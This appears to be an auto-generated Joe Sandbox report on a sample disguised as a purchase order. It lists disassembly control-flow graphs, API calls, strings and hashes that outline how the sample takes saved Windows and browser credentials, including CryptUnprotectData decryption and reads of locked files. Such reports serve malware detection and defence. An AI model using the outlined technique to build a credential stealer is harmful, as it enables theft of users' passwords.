                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                              APIs
                                                              • memset.MSVCRT ref: 0041898C
                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: InfoSystemmemset
                                                              • String ID:
                                                              • API String ID: 3558857096-0
                                                              • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                              • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                              APIs
                                                              • memset.MSVCRT ref: 004455C2
                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 0044570D
                                                              • memset.MSVCRT ref: 00445725
                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              • memset.MSVCRT ref: 0044573D
                                                              • memset.MSVCRT ref: 00445755
                                                              • memset.MSVCRT ref: 004458CB
                                                              • memset.MSVCRT ref: 004458E3
                                                              • memset.MSVCRT ref: 0044596E
                                                              • memset.MSVCRT ref: 00445A10
                                                              • memset.MSVCRT ref: 00445A28
                                                              • memset.MSVCRT ref: 00445AC6
                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              • memset.MSVCRT ref: 00445B52
                                                              • memset.MSVCRT ref: 00445B6A
                                                              • memset.MSVCRT ref: 00445C9B
                                                              • memset.MSVCRT ref: 00445CB3
                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                              • memset.MSVCRT ref: 00445B82
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                              • memset.MSVCRT ref: 00445986
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                              • API String ID: 1963886904-3798722523
                                                              • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                              • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                              • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                              • String ID: $/deleteregkey$/savelangfile
                                                              • API String ID: 2744995895-28296030
                                                              • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                              • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                              • memset.MSVCRT ref: 0040B756
                                                              • memset.MSVCRT ref: 0040B7F5
                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                              • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                              • memset.MSVCRT ref: 0040B851
                                                              • memset.MSVCRT ref: 0040B8CA
                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                              • memset.MSVCRT ref: 0040BB53
                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                              • String ID: chp$v10
                                                              • API String ID: 1297422669-2783969131
                                                              • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                              • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • free.MSVCRT ref: 0040E49A
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                              • memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E3EC
                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E407
                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E422
                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E43D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                              • API String ID: 3849927982-2252543386
                                                              • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                              • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                              APIs
                                                              • memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                              • String ID:
                                                              • API String ID: 3715365532-3916222277
                                                              • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                              • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                              • String ID: bhv
                                                              • API String ID: 4234240956-2689659898
                                                              • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                              • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
